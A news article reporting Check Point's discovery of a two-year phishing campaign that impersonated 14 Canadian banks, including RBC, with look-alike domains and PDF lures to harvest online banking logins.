Some of Canada’s biggest banks have been hit by a two-year phishing campaign which saw fraudsters impersonating them to harvest customers’ online banking logins.
A cybersecurity research team at Check Point spotted that a total of 14 banks, including the Canadian Imperial Bank of Commerce (CIBC), Toronto-Dominion (TD) Canada Trust and Scotiabank, all saw look-alike domains with their names used to mislead legitimate customers to a phishing page where they were asked to enter their banking credentials.
After investigating one URL linked to a Ukrainian IP address, Check Point found a whole host of URLs impersonating Canadian banks linked to this same address. This also led to other IP addresses under the same netblock being unearthed, revealing a “massive infrastructure” of fake but real-looking URLs.
Most recently the Royal Bank of Canada (RBC), which has 16 million customers and is the largest bank in Canada by market capitalisation, fell victim to the impersonators.
The email sent to RBC customers included a PDF with the bank’s logo asking them to renew their RBC Express “digital certificate”, providing an “authorisation code” which customers were asked to use when redirected to the phishing link. The URL asked customers to enter their login ID and their password.
Check Point found that the impersonators had used a screenshot of RBC’s official website and then layered invisible textboxes over the top of information fields.
After the customer attempts to sign in, their credentials are presumably saved by the impersonators before being redirected to a registration page where they are asked to enter the authorisation code received in the phishing email. They are then asked to wait whilst a fake digital certificate is generated.
The realisation that these impersonators have been operating for two years came when when Check Point cross-referenced the PDF attachment used to spoof RBC with other banks which had fallen foul of similar phishing scams. Check Point found continuity in the phrasing used across the PDF attachments, and that in some cases the PDFs were password-protected to evade detection.
Check Point confirms that it has now “successfully intercepted these described attacks and was able to block all of the malicious attachments involved in this campaign”.